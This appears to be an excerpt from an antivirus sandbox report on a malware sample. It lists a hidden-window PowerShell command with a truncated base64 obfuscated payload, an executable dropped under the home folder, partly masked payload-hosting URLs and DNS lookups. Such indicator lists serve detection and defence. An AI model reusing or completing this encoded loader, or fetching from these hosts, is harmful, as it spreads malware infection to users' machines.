Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD UwBlAFQALQBpAHQARQBtACAAKAAnAHYAQQBSAEkAJwArACcAYQBiAEwAJwArACcARQA6AGUAJwArACcAZwBxACcAKwAnAFIAbQAnACkAIAAoACAAWwBUAFkAcABFAF0AKAAiAHsAMQB9AHsAMgB9AHsANQB9AHsAMAB9AHsANA...
- %HOMEPATH%\ujoyfh_\f0pmo3z\ogobjqyy0.exe
- %HOMEPATH%\ujoyfh_\f0pmo3z\ogobjqyy0.exe
- http://am##al.ga/wp-content/cUFTze5/
- http://lu####idsupply.su/
- http://al####istool.com/wp-admin/3dk0z92i4/
- DNS ASK al####pase.coach
- DNS ASK am##al.ga
- DNS ASK ie##.org.uk
- DNS ASK on####apps.com.au
- DNS ASK ga###ndia.com
- DNS ASK lu####idsupply.su
- DNS ASK al####istool.com
- DNS ASK fa###m24.pro
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD UwBlAFQALQBpAHQARQBtACAAKAAnAHYAQQBSAEkAJwArACcAYQBiAEwAJwArACcARQA6AGUAJwArACcAZwBxACcAKwAnAFIAbQAnACkAIAAoACAAWwBUAFkAcABFAF0AKAAiAHsAMQB9AHsAMgB9AHsANQB9AHsAMAB9AHsANA...' (with hidden window)